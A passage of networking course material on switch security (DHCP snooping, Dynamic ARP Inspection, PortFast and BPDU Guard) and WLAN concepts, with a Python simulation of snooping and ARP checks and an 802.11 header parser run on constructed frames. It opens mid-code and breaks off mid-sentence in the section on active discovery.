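    def snoop_dhcp(self, port_name: str, pkt: Dhcp) -> str:
        port = self.ports[port_name]
        server_msg = pkt.msg_type in ("OFFER", "ACK", "NAK")
        if not port.trusted:
            if server_msg:
                return "DROP: DHCP server message on untrusted port"
            if pkt.src_mac.lower() != pkt.chaddr.lower():
                # "Verification of hwaddr field is enabled" in the show output:
                # catches a client that keeps a legitimate Ethernet source MAC
                # but puts a different address in the DHCP payload
                return "DROP: chaddr does not match Ethernet source MAC"
        elif pkt.msg_type == "ACK":
            # lease confirmed by a trusted server: record the IP-to-MAC binding
            self.bindings[(port.vlan, pkt.chaddr.lower())] = pkt.yiaddr
        return "FORWARD"

    def inspect_arp(self, port_name: str, pkt: Arp,
                    validate: tuple[str, ...] = ("src-mac", "ip")) -> str:
        port = self.ports[port_name]
        if port.trusted:
            return "FORWARD: trusted port, not inspected"
        if "src-mac" in validate and pkt.src_mac.lower() != pkt.sender_mac.lower():
            return "DROP: src-mac validation failed"
        if "ip" in validate:
            # sender IP is checked in every ARP packet, target IP only in replies
            to_check = [pkt.sender_ip] + ([pkt.target_ip] if pkt.is_reply else [])
            for ip in to_check:
                if ip in ("0.0.0.0", "255.255.255.255") or IPv4Address(ip).is_multicast:
                    return f"DROP: ip validation failed on {ip}"
        # the core DAI check: sender IP/MAC must match a snooping binding
        if self.bindings.get((port.vlan, pkt.sender_mac.lower())) != pkt.sender_ip:
            return "DROP: sender IP/MAC has no DHCP snooping binding"
        return "FORWARD"


def demo() -> dict[str, str]:
    """Topology from the text: DHCP server on trusted F0/1, a PC on untrusted F0/5 (VLAN 5)."""
    sw = Switch(ports={"F0/1": Port("F0/1", 5, trusted=True), "F0/5": Port("F0/5", 5)})
    pc, server, other = "00d0.ba01.1111", "00d0.ba02.2222", "00d0.ba03.3333"
    r: dict[str, str] = {}
    r["discover"] = sw.snoop_dhcp("F0/5", Dhcp(pc, pc, "DISCOVER"))
    r["spoofed_chaddr"] = sw.snoop_dhcp("F0/5", Dhcp(pc, other, "DISCOVER"))
    r["rogue_offer"] = sw.snoop_dhcp("F0/5", Dhcp(other, pc, "OFFER", "10.5.0.250"))
    r["ack"] = sw.snoop_dhcp("F0/1", Dhcp(server, pc, "ACK", "10.5.0.20"))
    r["arp_ok"] = sw.inspect_arp("F0/5", Arp(pc, pc, "10.5.0.20", "10.5.0.1"))
    r["arp_claims_gateway"] = sw.inspect_arp("F0/5", Arp(pc, pc, "10.5.0.1", "10.5.0.20", is_reply=True))
    r["arp_bad_srcmac"] = sw.inspect_arp("F0/5", Arp(pc, other, "10.5.0.20", "10.5.0.1"))
    return r


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:20} {verdict}")
```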

11.4.4 Syntax Checker – Mitigate ARP Attacks

Implement DAI for a switch based on the following topology and specified requirements.

You are currently logged into S1. Enable DHCP snooping globally for the switch.

S1(config)#ip dhcp snooping

Enter interface configuration mode for g0/1 - 2, trust the interfaces for both DHCP snooping and DAI, and then
return to global configuration mode.

S1(config)#interface range g0/1 - 2
S1(config-if-range)#ip dhcp snooping trust
S1(config-if-range)#ip arp inspection trust
S1(config-if-range)#exit

Enable DHCP snooping and DAI for VLANs 10,20,30-49.

S1(config)#ip dhcp snooping vlan 10,20,30-49
S1(config)#ip arp inspection vlan 10,20,30-49
S1(config)#

You have successfully configured DAI for the switch.

11.5 Mitigate STP Attacks

11.5.1 PortFast and BPDU Guard

Recall that network attackers can manipulate the Spanning Tree Protocol (STP) to conduct an attack by
spoofing the root bridge and changing the topology of a network. To mitigate Spanning Tree Protocol
(STP) manipulation attacks, use PortFast and Bridge Protocol Data Unit (BPDU) Guard:

• PortFast - PortFast immediately brings an interface configured as an access port to the forwarding
state from a blocking state, bypassing the listening and learning states. Apply to all end-user ports.
PortFast should only be configured on ports attached to end devices.
• BPDU Guard - BPDU guard immediately error disables a port that receives a BPDU. Like PortFast,
BPDU guard should only be configured on interfaces attached to end devices.

In the figure, the access ports for S1 should be configured with PortFast and BPDU Guard.

11.5.2 Configure PortFast

PortFast bypasses the STP listening and learning states to minimize the time that access ports must wait for
STP to converge. If PortFast is enabled on a port connecting to another switch, there is a risk of creating a
spanning-tree loop.

PortFast can be enabled on an interface by using the spanning-tree portfast interface configuration
command. Alternatively, Portfast can be configured globally on all access ports by using the spanning-tree
portfast default global configuration command.

To verify whether PortFast is enabled globally, you can use either the show running-config | begin
span command or the show spanning-tree summary command. To verify whether PortFast is enabled on an
interface, use the show running-config interface type/number command, as shown in the following example.
The show spanning-tree interface type/number detail command can also be used for verification.

Notice that when PortFast is enabled, warning messages are displayed.

S1(config)# interface fa0/1
S1(config-if)# switchport mode access
S1(config-if)# spanning-tree portfast
%Warning: portfast should only be enabled on ports connected to a single
host. Connecting hubs, concentrators, switches, bridges, etc... to this
interface when portfast is enabled, can cause temporary bridging loops.
Use with CAUTION
%Portfast has been configured on FastEthernet0/1 but will only
have effect when the interface is in a non-trunking mode.
S1(config-if)# exit
S1(config)# spanning-tree portfast default
%Warning: this command enables portfast by default on all interfaces. You
should now disable portfast explicitly on switched ports leading to hubs,
switches and bridges as they may create temporary bridging loops.
S1(config)# exit
S1# show running-config | begin span
spanning-tree mode pvst
spanning-tree portfast default
spanning-tree extend system-id
!
interface FastEthernet0/1
switchport mode access
spanning-tree portfast
!
interface FastEthernet0/2
!
interface FastEthernet0/3
!
interface FastEthernet0/4
!
interface FastEthernet0/5
!
(output omitted)
S1#

11.5.3 Configure BPDU Guard

Even though PortFast is enabled, the interface will still listen for BPDUs. Unexpected BPDUs might be
accidental, or part of an unauthorized attempt to add a switch to the network.

If any BPDUs are received on a BPDU Guard enabled port, that port is put into error-disabled state. This
means the port is shut down and must be manually re-enabled or automatically recovered through
the errdisable recovery cause bpduguard global command.

BPDU Guard can be enabled on a port by using the spanning-tree bpduguard enable interface configuration
command. Alternatively, use the spanning-tree portfast bpduguard default global configuration command
to globally enable BPDU guard on all PortFast-enabled ports.

To display information about the state of spanning tree, use the show spanning-tree summary command. In
the example, PortFast default and BPDU Guard are both enabled as the default state for ports configured as
access mode.

Note: Always enable BPDU Guard on all PortFast-enabled ports.

S1(config)# interface fa0/1
S1(config-if)# spanning-tree bpduguard enable
S1(config-if)# exit
S1(config)# spanning-tree portfast bpduguard default
S1(config)# end
S1# show spanning-tree summary
Switch is in pvst mode
Root bridge for: none
Extended system ID is enabled
Portfast Default is enabled
PortFast BPDU Guard Default is enabled
Portfast BPDU Filter Default is disabled
Loopguard Default is disabled
EtherChannel misconfig guard is enabled
UplinkFast is disabled
BackboneFast is disabled
Configured Pathcost method used is short
(output omitted)
S1#

11.5.4 Syntax Checker – Mitigate STP Attacks

Implement PortFast and BPDU Guard for a switch based on the following topology and specified requirements

You are currently logged into S1. Complete the following steps to implement PortFast and BPDU Guard on all
access ports:

*Enter interface configuration mode for fa0/1 - 24.

*Configure the ports for access mode.

*Return to global configuration mode.

*Enable PortFast by default for all access ports.

*Enable BPDU Guard by default for all access ports.

S1(config)#interface range fa0/1 - 24
S1(config-if-range)#switchport mode access
S1(config-if-range)#exit
S1(config)#spanning-tree portfast default
S1(config)#spanning-tree portfast bpduguard default
S1(config)# exit

Verify that PortFast and BPDU Guard are enabled by default by viewing STP summary information.

S1#show spanning-tree summary
Switch is in pvst mode
Root bridge for: none
Extended system ID is enabled
Portfast Default is enabled
PortFast BPDU Guard Default is enabled
Portfast BPDU Filter Default is disabled
Loopguard Default is disabled
EtherChannel misconfig guard is enabled
UplinkFast is disabled
BackboneFast is disabled
Configured Pathcost method used is short
(output omitted)
S1#

You have successfully configured and verified PortFast and BPDU Guard for the switch.

11.6 Module Practice and Quiz

11.6.1 Packet Tracer – Switch Security Configuration

In this Packet Tracer activity, you will:

• Secure unused ports
• Implement port security
• Mitigate VLAN hopping attacks
• Mitigate DHCP attacks
• Mitigate ARP attacks
• Mitigate STP attacks
• Verify the switch security configuration

11.6.2 Lab – Switch Security Configuration

In this lab, you will:

• Secure unused ports
• Implement port security
• Mitigate VLAN hopping attacks
• Mitigate DHCP attacks
• Mitigate ARP attacks
• Mitigate STP attacks
• Verify the switch security configuration

11.6.3 What did I learn in this module?

All switch ports (interfaces) should be secured before the switch is deployed for production use. The simplest
and most effective method to prevent MAC address table overflow attacks is to enable port security. By
default, Layer 2 switch ports are set to dynamic auto (trunking on). The switch can be configured to learn
about MAC addresses on a secure port in one of three ways: manually configured, dynamically learned, and
dynamically learned – sticky. Port security aging can be used to set the aging time for static and dynamic
secure addresses on a port. Two types of aging are supported per port: absolute and inactivity. If the MAC
address of a device attached to the port differs from the list of secure addresses, then a port violation occurs.
By default, the port enters the error-disabled state. When a port is shut down and placed in the
error-disabled state, no traffic is sent or received on that port. To display port security settings for the
switch, use the show port-security command.

To mitigate VLAN hopping attacks:

Step 1. Disable DTP negotiations on non-trunking ports.
Step 2. Disable unused ports.
Step 3. Manually enable the trunk link on a trunking port.
Step 4. Disable DTP negotiations on trunking ports.
Step 5. Set the native VLAN to a VLAN other than VLAN 1.

The goal of a DHCP starvation attack is to create a Denial of Service (DoS) for connecting clients. DHCP
spoofing attacks can be mitigated by using DHCP snooping on trusted ports. DHCP snooping determines
whether DHCP messages are from an administratively-configured trusted or untrusted source. It then filters
DHCP messages and rate-limits DHCP traffic from untrusted sources. Use the following steps to enable
DHCP snooping:

Step 1. Enable DHCP snooping.
Step 2. On trusted ports, use the ip dhcp snooping trust interface configuration command.
Step 3. Limit the number of DHCP discovery messages that can be received per second on untrusted ports.
Step 4. Enable DHCP snooping by VLAN, or by a range of VLANs.

Dynamic ARP inspection (DAI) requires DHCP snooping and helps prevent ARP attacks by:

• Not relaying invalid or gratuitous ARP Replies out to other ports in the same VLAN.
• Intercepting all ARP Requests and Replies on untrusted ports.
• Verifying each intercepted packet for a valid IP-to-MAC binding.
• Dropping and logging ARP Replies coming from invalid sources to prevent ARP poisoning.
• Error-disabling the interface if the configured DAI number of ARP packets is exceeded.

To mitigate the chances of ARP spoofing and ARP poisoning, follow these DAI implementation guidelines:

• Enable DHCP snooping globally.
• Enable DHCP snooping on selected VLANs.
• Enable DAI on selected VLANs.
• Configure trusted interfaces for DHCP snooping and ARP inspection.

As a general guideline, configure all access switch ports as untrusted and all uplink ports that are connected
to other switches as trusted.

DAI can also be configured to check for both destination or source MAC and IP addresses:

• Destination MAC - Checks the destination MAC address in the Ethernet header against the target
MAC address in ARP body.
• Source MAC - Checks the source MAC address in the Ethernet header against the sender MAC
address in the ARP body.
• IP address - Checks the ARP body for invalid and unexpected IP addresses including addresses
[Link], [Link], and all IP multicast addresses.

To mitigate Spanning Tree Protocol (STP) manipulation attacks, use PortFast and Bridge Protocol Data Unit
(BPDU) Guard:

• PortFast - PortFast immediately brings an interface configured as an access or trunk port to the
forwarding state from a blocking state, bypassing the listening and learning states. Apply to all end-
user ports. PortFast should only be configured on ports attached to end devices. PortFast bypasses
the STP listening and learning states to minimize the time that access ports must wait for STP to
converge. If PortFast is enabled on a port connecting to another switch, there is a risk of creating a
spanning-tree loop.
• BPDU Guard - BPDU guard immediately error disables a port that receives a BPDU. Like PortFast,
BPDU guard should only be configured on interfaces attached to end devices. BPDU Guard can be
enabled on a port by using the spanning-tree bpduguard enable interface configuration command.
Alternatively, use the spanning-tree portfast bpduguard default global configuration command to
globally enable BPDU guard on all PortFast-enabled ports.

11.6.4 Module Quiz – Switch Security Configuration

12 WLAN Concepts
12.0.1 Why should I take this module?

Welcome to WLAN Concepts!

Do you use a wireless connection at home, work or school? Ever wonder how it works?

There are many ways to connect wirelessly. Like everything else involving networks, these connection types
are best used in particular situations. They require specific devices and are also prone to certain types of
attacks. And of course, there are solutions to mitigate these attacks. Want to learn more? The WLAN
Concepts module gives you the foundational knowledge you need to understand what Wireless LANs are,
what they can do, and how to protect them.

If you are curious, don’t wait, get started today!

12.0.2 What will I learn in this module?

Module Title: WLAN Concepts

Module Objective: Explain how WLANs enable network connectivity.

Topic Title                Topic Objective
Introduction to Wireless   Describe WLAN technology and standards.
Components of WLANs        Describe the components of a WLAN infrastructure.
WLAN Operation             Explain how wireless technology enables WLAN operation.
CAPWAP Operation           Explain how a WLC uses CAPWAP to manage multiple APs.
Channel Management         Describe channel management in a WLAN.
WLAN Threats               Describe threats to WLANs.
Secure WLANs               Describe WLAN security mechanisms.

12.1 Introduction to Wireless

12.1.1 Benefits of Wireless

A Wireless LAN (WLAN) is a type of wireless network that is commonly used in homes, offices, and campus
environments. Networks must support people who are on the move. People connect using computers, laptops,
tablets, and smart phones. There are many different network infrastructures that provide network access, such
as wired LANs, service provider networks, and cell phone networks. But it’s the WLAN that makes mobility
possible within the home and business environments.

In businesses with a wireless infrastructure in place, there can be a cost savings any time equipment changes,
or when relocating an employee within a building, reorganizing equipment or a lab, or moving to temporary
locations or project sites. A wireless infrastructure can adapt to rapidly changing needs and technologies.

12.1.2 Types of Wireless Network

Wireless networks are based on the Institute of Electrical and Electronics Engineers (IEEE) standards and can
be classified broadly into four main types: WPAN, WLAN, WMAN, and WWAN.

12.1.3 Wireless Technologies

Wireless technology uses the unlicensed radio spectrum to send and receive data. The unlicensed spectrum
is accessible to anyone who has a wireless router and wireless technology in the device they are using.

12.1.4 802.11 Standards

The world of wireless communications is vast. However, for particular job-related skills, we want to focus on
specific aspects of Wi-Fi. The best place to start is with the IEEE 802.11 WLAN standards. These standards
define how radio frequencies are used for wireless links. Most of the standards specify that wireless devices
have one antenna to transmit and receive wireless signals on the specified radio frequency (2.4 GHz or 5
GHz). Some of the newer standards that transmit and receive at higher speeds require access points (APs)
and wireless clients to have multiple antennas using the multiple-input and multiple-output (MIMO) technology.
MIMO uses multiple antennas as both the transmitter and receiver to improve communication performance.
Up to eight transmit and receive antennas can be used to increase throughput.

Various implementations of the IEEE 802.11 standard have been developed over the years. The table
highlights these standards.

IEEE WLAN Standard   Radio Frequency   Description
802.11               2.4 GHz           • speeds of up to 2 Mbps
802.11a              5 GHz             • speeds of up to 54 Mbps
                                       • small coverage area
                                       • less effective at penetrating building structures
                                       • not interoperable with 802.11b and 802.11g
802.11b              2.4 GHz           • speeds of up to 11 Mbps
                                       • longer range than 802.11a
                                       • better able to penetrate building structures
802.11g              2.4 GHz           • speeds of up to 54 Mbps
                                       • backward compatible with 802.11b with reduced bandwidth capacity
802.11n              2.4 GHz, 5 GHz    • data rates range from 150 Mbps to 600 Mbps with a distance range of up to 70 m (230 feet)
                                       • APs and wireless clients require multiple antennas using MIMO technology
                                       • backward compatible with 802.11a/b/g devices with limiting data rates
802.11ac             5 GHz             • provides data rates ranging from 450 Mbps to 1.3 Gbps (1300 Mbps) using MIMO technology
                                       • up to eight antennas can be supported
                                       • backwards compatible with 802.11a/n devices with limiting data rates
802.11ax             2.4 GHz, 5 GHz    • latest standard released in 2019
                                       • also known as Wi-Fi 6 or High-Efficiency Wireless (HEW)
                                       • provides improved power efficiency, higher data rates, increased capacity, and handles many connected devices
                                       • currently operates using 2.4 GHz and 5 GHz but will use 1 GHz and 7 GHz when those frequencies become available
                                       • search the internet for Wi-Fi Generation 6 for more information

12.1.5 Radio Frequencies

All wireless devices operate in the radio waves range of the electromagnetic spectrum. WLAN networks
operate in the 2.4 GHz frequency band and the 5 GHz band. Wireless LAN devices have transmitters and
receivers tuned to specific frequencies of the radio waves range, as shown in the figure. Specifically, the
following frequency bands are allocated to 802.11 wireless LANs:

• 2.4 GHz (UHF) - 802.11b/g/n/ax


• 5 GHz (SHF) - 802.11a/n/ac/ax

Figure: The Electromagnetic Spectrum, showing wireless devices and other technologies and where they operate on the electromagnetic spectrum.

12.1.6 Wireless Standards Organizations

Standards ensure interoperability between devices that are made by different manufacturers. Internationally,
the three organizations influencing WLAN standards are the ITU-R, the IEEE, and the Wi-Fi Alliance.

12.1.7 Check Your Understanding – Introduction to Wireless

12.2 WLAN Concepts

12.2.1 Video – WLAN Concepts

In the previous topic you learned about the benefits of wireless, types of wireless networks, 802.11 standards,
and radio frequencies. Here we will learn about WLAN components.

12.2.2 Wireless NIC

Wireless deployments require a minimum of two devices that have a radio transmitter and a radio receiver
tuned to the same radio frequencies:

• End devices with wireless NICs


• A network device, such as a wireless router or wireless AP

To communicate wirelessly, laptops, tablets, smart phones, and even the latest automobiles include integrated
wireless NICs that incorporate a radio transmitter/receiver. However, if a device does not have an integrated
wireless NIC, then a USB wireless adapter can be used, as shown in the figure.

Note: Many wireless devices you are familiar with do not have visible antennas. They are embedded inside
smartphones, laptops, and wireless home routers.

12.2.3 Wireless Home Router

The type of infrastructure device that an end device associates and authenticates with varies based on the
size and requirement of the WLAN.

For example, a home user typically interconnects wireless devices using a small, wireless router, as shown in
the figure. The wireless router serves as an:

• Access point - This provides 802.11a/b/g/n/ac wireless access.


• Switch - This provides a four-port, full-duplex, 10/100/1000 Ethernet switch to interconnect wired
devices.
• Router - This provides a default gateway for connecting to other network infrastructures, such as the
internet.

A wireless router is commonly implemented as a small business or residential wireless access device. The
wireless router advertises its wireless services by sending beacons containing its service set identifier
(SSID). Devices wirelessly discover the SSID and attempt to authenticate and then associate with it to access
the local network and internet.

Most wireless routers also provide advanced features, such as high-speed access, support for video
streaming, IPv6 addressing, quality of service (QoS), configuration utilities, and USB ports to connect printers
or portable drives.

Additionally, home users who want to extend their network services can implement Wi-Fi range extenders. A
device can connect wirelessly to the extender, which boosts its communications to be repeated to the wireless
router.

12.2.4 Wireless Access Point

While range extenders are easy to set up and configure, the best solution would be to install another wireless
access point to provide dedicated wireless access to the user devices. Wireless clients use their wireless NIC
to discover nearby APs advertising their SSID. Clients then attempt to authenticate and associate with an AP.
After being authenticated, wireless users have access to network resources. The Cisco Meraki Go APs are
shown in the figure.

12.2.5 AP Categories

APs can be categorized as either autonomous APs or controller-based APs.

Autonomous APs

These are standalone devices configured using a command line interface or a GUI, as shown in the figure.
Autonomous APs are useful in situations where only a couple of APs are required in the organization. A home
router is an example of an autonomous AP because the entire AP configuration resides on the device. If the
wireless demands increase, more APs would be required. Each AP would operate independent of other APs
and each AP would require manual configuration and management. This would become overwhelming if many
APs were needed.

Controller-based APs

These devices require no initial configuration and are often called lightweight APs (LAPs). LAPs use the
Control and Provisioning of Wireless Access Points (CAPWAP) protocol, the successor to the older Lightweight
Access Point Protocol (LWAPP), to communicate with a WLAN controller (WLC), as shown in the next figure.
Controller-based APs are useful in situations where many APs are required in the network. As more APs are
added, each AP is automatically configured and managed by the WLC.

Notice in the figure that the WLC has four ports connected to the switching infrastructure. These four ports are
configured as a link aggregation group (LAG) to bundle them together. Much like how EtherChannel operates,
LAG provides redundancy and load-balancing. All the ports on the switch that are connected to the WLC need
to be trunking and configured with EtherChannel mode on. However, LAG does not operate exactly like
EtherChannel. The WLC does not support Port Aggregation Protocol (PAgP) or Link Aggregation Control
Protocol (LACP), so the switch side must use mode on rather than a negotiated mode (desirable/auto or
active/passive), or the bundle will never form.

12.2.6 Wireless Antennas

Most business class APs require external antennas to make them fully functioning units.

Omnidirectional Antennas

Omnidirectional Antennas such as the one shown in the figure provide 360-degree coverage and are ideal in
houses, open office areas, conference rooms, and outside areas.

Directional Antennas

Directional antennas focus the radio signal in a given direction. This enhances the signal to and from the AP in
the direction the antenna is pointing, which provides a stronger signal in one direction and reduced signal
strength in all other directions. Examples of directional Wi-Fi antennas include Yagi and parabolic dish
antennas.

MIMO Antennas

Multiple Input Multiple Output (MIMO) uses multiple antennas to increase available bandwidth for IEEE
802.11n/ac/ax wireless networks. Up to eight transmit and receive antennas can be used to increase
throughput.

12.2.7 Check Your Understanding – WLAN Concepts

12.3 WLAN Operation

12.3.1 Video - WLAN Operation

The previous topic covered WLAN components. This topic will cover WLAN operation.

Click Play to view a video about WLAN operation.

12.3.2 802.11 Wireless Topology Modes

Wireless LANs can accommodate various network topologies. The 802.11 standard identifies two main
wireless topology modes: Ad hoc mode and Infrastructure mode. Tethering is also a mode sometimes used to
provide quick wireless access.

Ad hoc mode - This is when two devices connect wirelessly in a peer-to-peer (P2P) manner without using
APs or wireless routers. Examples include wireless clients connecting directly to each other using Bluetooth or
Wi-Fi Direct. The IEEE 802.11 standard refers to an ad hoc network as an independent basic service set
(IBSS).

Infrastructure mode - This is when wireless clients interconnect via a wireless router or AP, such as in
WLANs. APs connect to the network infrastructure using the wired distribution system, such as Ethernet.

Tethering - When a smart phone or tablet with cellular data access is enabled to create a personal hotspot,
the feature is sometimes referred to as tethering. A hotspot is usually a temporary quick solution that enables
a smart phone to provide the wireless services of a Wi-Fi router. Other devices can associate and authenticate
with the smart phone to use the internet connection. Although the module lists it alongside ad hoc mode, the
phone is acting as an AP, so from the client's point of view the connection is a small infrastructure-mode BSS.

12.3.3 BSS and ESS

Infrastructure mode defines two topology building blocks: A Basic Service Set (BSS) and an Extended Service
Set (ESS).

Basic Service Set (BSS)

A BSS consists of a single AP interconnecting all associated wireless clients. Two BSSs are shown in the
figure. The circles depict the coverage area for the BSS, which is called the Basic Service Area (BSA). If a
wireless client moves out of its BSA, it can no longer directly communicate with other wireless clients within
the BSA.

The Layer 2 MAC address of the AP is used to uniquely identify each BSS, which is called the Basic Service
Set Identifier (BSSID). Therefore, the BSSID is the formal name of the BSS and is always associated with only
one AP.

Extended Service Set (ESS)

When a single BSS provides insufficient coverage, two or more BSSs can be joined through a common
distribution system (DS) into an ESS. An ESS is the union of two or more BSSs interconnected by a wired DS.
Each ESS is identified by a SSID and each BSS is identified by its BSSID.

Wireless clients in one BSA can now communicate with wireless clients in another BSA within the same ESS.
Roaming mobile wireless clients may move from one BSA to another (within the same ESS) and seamlessly
connect.

The rectangular area in the figure depicts the coverage area within which members of an ESS may
communicate. This area is called the Extended Service Area (ESA).

12.3.4 802.11 Frame Structure

Recall that all Layer 2 frames consist of a header, payload, and Frame Check Sequence (FCS) section. The
802.11 frame format is similar to the Ethernet frame format, except that it contains more fields, as shown in
the figure.

All 802.11 wireless frames contain the following fields:

• Frame Control - This identifies the type of wireless frame and contains subfields for protocol version,
frame type and subtype, the To DS and From DS flags, power management, and security settings (the
Protected Frame bit).
• Duration - This is typically used to indicate the remaining duration needed to receive the next frame
transmission.
• Address 1, Address 2, Address 3 - Which MAC address each field carries depends on the To DS and
From DS flags. Address 1 is always the receiver of this transmission and Address 2 is always the
transmitter; Address 3 holds whichever of the BSSID, source, or destination is left over.

From a wireless client to the AP (To DS = 1, From DS = 0):

• Address 1 Receiver Address - MAC address of the AP (the BSSID).
• Address 2 Transmitter Address - MAC address of the sending wireless client (the source address).
• Address 3 Destination Address - MAC address of the final destination, which could be a wireless device
or a wired device behind the AP.

From the AP to a wireless client (To DS = 0, From DS = 1):

• Address 1 Receiver Address - MAC address of the destination wireless client.
• Address 2 Transmitter Address - MAC address of the AP (the BSSID).
• Address 3 Source Address - MAC address of the original sender, which could be a wireless device or a
wired device behind the AP.

• Sequence Control - This contains information to control sequencing and fragmented frames.
• Address 4 - This is usually absent. It is present only when both To DS and From DS are set, that is, on a
wireless link between two APs (a wireless bridge or WDS link), where Address 1 and Address 2 identify
the two APs and Address 3 and Address 4 carry the destination and source. Management frames and ad
hoc (IBSS) data frames use only three addresses.
• Payload - This contains the data for transmission.
• FCS - This is used for Layer 2 error detection. It is a CRC, not a cryptographic integrity check; protection
against deliberate modification comes from the WLAN security protocol (for example the message
integrity check in WPA2/CCMP), not from the FCS.
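The address rules above are easiest to get right in code. The following Python parser is an added example, not code from the module: it reads the Frame Control field, uses the To DS and From DS flags to decide which field is the BSSID, source and destination, and handles the four-address bridge case. The frames it is run on are constructed by the build_frame() helper with made-up locally administered MAC addresses.

```python
"""Parse an 802.11 MAC header and name the address fields by To DS / From DS.

Added example; this is not code from the module. The frames are built by the
build_frame() helper with made-up MAC addresses (locally administered, 02:...).
"""
import struct

FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}

# Frame Control flag bits (the high byte of the 16-bit field)
FLAG_TO_DS = 0x01
FLAG_FROM_DS = 0x02
FLAG_PROTECTED = 0x40


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_80211_header(frame):
    """Return a dict describing the MAC header of a management or data frame."""
    if len(frame) < 24:
        raise ValueError("frame too short for a 24-byte 802.11 header")
    fc, duration = struct.unpack_from("<HH", frame, 0)  # little-endian on the air
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    flags = fc >> 8
    if ftype == 1:
        raise ValueError("control frames use a shorter, different layout")
    to_ds = bool(flags & FLAG_TO_DS)
    from_ds = bool(flags & FLAG_FROM_DS)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    seq_ctrl = struct.unpack_from("<H", frame, 22)[0]

    # Address 1 is always the receiver of this hop and Address 2 the transmitter.
    # The two DS flags say which of them is the BSSID and what Address 3 carries.
    header_len = 24
    if not to_ds and not from_ds:        # management frames and IBSS data
        roles = {"DA": a1, "SA": a2, "BSSID": a3}
    elif to_ds and not from_ds:          # client -> AP
        roles = {"BSSID": a1, "SA": a2, "DA": a3}
    elif from_ds and not to_ds:          # AP -> client
        roles = {"DA": a1, "BSSID": a2, "SA": a3}
    else:                                 # AP -> AP wireless bridge: four addresses
        if len(frame) < 30:
            raise ValueError("four-address frame too short")
        header_len = 30
        roles = {"RA": a1, "TA": a2, "DA": a3, "SA": frame[24:30]}

    return {
        "type": FRAME_TYPES[ftype],
        "subtype": subtype,
        "to_ds": to_ds,
        "from_ds": from_ds,
        "protected": bool(flags & FLAG_PROTECTED),
        "duration": duration,
        "sequence": seq_ctrl >> 4,
        "fragment": seq_ctrl & 0xF,
        "header_len": header_len,
        "addresses": {role: mac_str(addr) for role, addr in roles.items()},
    }


def build_frame(ftype, subtype, to_ds, from_ds, a1, a2, a3, a4=None, protected=False):
    """Construct a header plus dummy body for the examples below (test helper)."""
    flags = (FLAG_TO_DS if to_ds else 0) | (FLAG_FROM_DS if from_ds else 0)
    flags |= FLAG_PROTECTED if protected else 0
    fc = (ftype << 2) | (subtype << 4) | (flags << 8)
    header = struct.pack("<HH", fc, 44) + a1 + a2 + a3 + struct.pack("<H", 1 << 4)
    if a4 is not None:
        header += a4
    return header + b"\x00" * 8  # placeholder payload


# Constructed addresses: a client, its AP, a wired host behind the AP, a second AP.
CLIENT = bytes.fromhex("02000000c101")
AP = bytes.fromhex("02000000a001")
AP2 = bytes.fromhex("02000000a002")
WIRED = bytes.fromhex("02000000d001")

UPLINK = build_frame(2, 0, True, False, AP, CLIENT, WIRED, protected=True)
DOWNLINK = build_frame(2, 0, False, True, CLIENT, AP, WIRED, protected=True)
BRIDGE = build_frame(2, 0, True, True, AP2, AP, WIRED, a4=CLIENT)
BEACON = build_frame(0, 8, False, False, b"\xff" * 6, AP, AP)

if __name__ == "__main__":
    for name, frame in ("uplink", UPLINK), ("downlink", DOWNLINK), ("bridge", BRIDGE), ("beacon", BEACON):
        print(name, parse_80211_header(frame)["addresses"])
```

Running the block prints the role-to-address mapping for each constructed frame; the same parser applied to a real capture (for example raw frames from a monitor-mode interface) is how a wireless IDS tells a frame transmitted by the AP from one transmitted by a client claiming to be that AP.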

12.3.5 CSMA/CA

WLANs are half-duplex, shared media configurations. Half-duplex means that a wireless device can either
transmit or receive at any given moment, but not both at once. Shared media means that all wireless clients on
a channel transmit and receive on the same radio channel. This creates a problem because a wireless client
cannot hear while it is sending, which makes it impossible to detect a collision.

To resolve this problem, WLANs use carrier sense multiple access with collision avoidance (CSMA/CA) as the
method to determine how and when to send data on the network. A wireless client does the following:

1. Listens to the channel to see if it is idle, which means that it senses no other traffic currently on the
channel. The channel is also called the carrier.
2. Sends a request to send (RTS) message to the AP to request dedicated access to the network.
3. Receives a clear to send (CTS) message from the AP granting access to send.
4. If the wireless client does not receive a CTS message, it waits a random amount of time (the backoff)
before restarting the process.
5. After it receives the CTS, it transmits the data.
6. All transmissions are acknowledged. If a wireless client does not receive an acknowledgment, it assumes
a collision occurred and restarts the process.

Note: The RTS/CTS exchange is optional. Most clients only use it for frames larger than a configured RTS
threshold; smaller frames go straight from the idle check and random backoff to transmission, and are still
acknowledged.

12.3.6 Wireless Client and AP Association

For wireless devices to communicate over a network, they must first associate with an AP or wireless router.
An important part of the 802.11 process is discovering a WLAN and subsequently connecting to it. Wireless
devices complete the following three stage process, as shown in the figure:

• Discover a wireless AP
• Authenticate with AP
• Associate with AP

In order to have a successful association, a wireless client and an AP must agree on specific parameters.
Parameters must then be configured on the AP and subsequently on the client to enable the negotiation of a
successful association.

• SSID -The SSID name appears in the list of available wireless networks on a client. In larger
organizations that use multiple VLANs to segment traffic, each SSID is mapped to one VLAN.
Depending on the network configuration, several APs on a network can share a common SSID.
• Password - This is required from the wireless client to authenticate to the AP.
• Network mode - This refers to the 802.11a/b/g/n/ac/ad WLAN standards. APs and wireless routers
can operate in a Mixed mode meaning that they can simultaneously support clients connecting via
multiple standards.
• Security mode - This refers to the security parameter settings, such as WEP, WPA, WPA2, or WPA3.
Always enable the highest security level supported by all of the clients.
• Channel settings - This refers to the frequency band, and the channel within it, used to transmit wireless
data. Wireless routers and APs can scan the radio frequency channels and automatically select an
appropriate channel setting. The channel can also be set manually if there is interference with another AP
or wireless device.

12.3.7 Passive and Active Discovery Mode

Wireless devices must discover and connect to an AP or wireless router. Wireless clients connect to the AP
using a scanning (probing) process. This process can be passive or active.

Passive mode

In passive mode, the AP openly advertises its service by periodically sending broadcast beacon frames
containing the SSID, supported standards, and security settings. The primary purpose of the beacon is to
allow wireless clients to learn which networks and APs are available in a given area. This allows the wireless
clients to choose which network and AP to use.

Active mode

In active mode, wireless clients must know the name of the SSID. The wireless client initiates the process by
broadcasting a probe request frame on multiple channels. The probe request includes the SSID name and
standards supported. APs configured with the SSID will send a probe response that includes the SSID,
supported standards, and security settings. Active mode may be required if an AP or wireless router is
